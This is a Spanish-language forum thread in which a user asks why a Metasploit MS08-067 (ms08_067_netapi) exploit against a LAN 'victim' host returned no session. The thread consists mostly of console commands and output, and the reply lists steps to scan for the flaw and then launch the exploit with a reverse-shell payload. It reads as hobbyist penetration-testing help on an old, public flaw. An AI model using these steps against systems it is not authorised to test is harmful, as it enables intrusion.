ayuda con error en pestenting metasploit porque este error??????

Iniciado por nightcode, 22 Julio 2019, 03:10 AM

0 Miembros y 1 Visitante están viendo este tema.

nightcode

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

  • Started reverse TCP handler on 192.168.1.XXX:4444
  • 192.168.1.XXX:445 - Automatically detecting the target...
  • 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
  • 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
    [-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
  • Exploit completed, but no session was created. <<<<< porque????
    msf5 exploit(windows/smb/ms08_067_netapi) >

    que estoy haciendo mal?
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"

Aguijon_zerO

#1
Cita de: nightcode en 22 Julio 2019, 03:10 AM
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost XXX.XXX.XXX (ip victima)
rhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost XXX.XXX.XXX (mi ip)
lhost => 192.168.1.xxx
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

  • Started reverse TCP handler on 192.168.1.XXX:4444
  • 192.168.1.XXX:445 - Automatically detecting the target...
  • 192.168.1.XXX:445 - Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
  • 192.168.1.XXX:445 - We could not detect the language pack, defaulting to English
    [-] 192.168.1.XXX:445 - Exploit aborted due to failure: no-target: No matching target
  • Exploit completed, but no session was created. <<<<< porque????
    msf5 exploit(windows/smb/ms08_067_netapi) >

    que estoy haciendo mal?

Ni siquiera especificas que version estas atacando..

windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.

Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.

Has un escaneo para verificar si es vulnerable..


> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run

#Luego se vuleve a proceder:

> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit


Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...
HACKING / CiberSecurity:
https://seguridadaguijon.blogspot.com/

nightcode

Cita de: AguijoN_ZerO en  3 Agosto 2019, 03:36 AM
Ni siquiera especificas que version estas atacando..

windows/smb/ms08_067_netapi explota una falla en la interpretación de la ruta del código de canonización de NetAPI32.dll a través del servicio Server.

Claramente te esta diciendo que no esta haciendo match con el objetivo, asi que valla uno a saber si la colocaste correctamente pero vamos a suponer que si.

Has un escaneo para verificar si el vulnerable..


> search ms08_067_check
> use auxiliary/scanner/smb/ms08_067_check
> show options
> set RHOSTS 192.168.x.x
> run

#Luego se vuleve a proceder:

> search ms08_067_netapi
> use exploit/windows/smb/ms08_067_netapi
> show options
> set RHOST 192.168.x.x
>set PAYLOAD xx/xx/xx
>exploit


Es teoria eso deberia bastar, pero Igual con la pobre información que proporcionas no hay mucho que decir...

windows 2008 r2 solucionado imagino que la version que ataque estaba parchada. no sabia que tenia auxiliar este exploit por eso no logre chekear primero...

gracias por tu respuesta Dexter xD
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"

Aguijon_zerO

#3
Cita de: nightcode en  4 Agosto 2019, 04:20 AM
windows 2008 r2 solucionado imagino que la version que ataque estaba parchada. no sabia que tenia auxiliar este exploit por eso no logre chekear primero...

gracias por tu respuesta Dexter xD


No fue nada, gracias por la pregunta Didi ..   Habia olvidado esa caricatura.. XDD
HACKING / CiberSecurity:
https://seguridadaguijon.blogspot.com/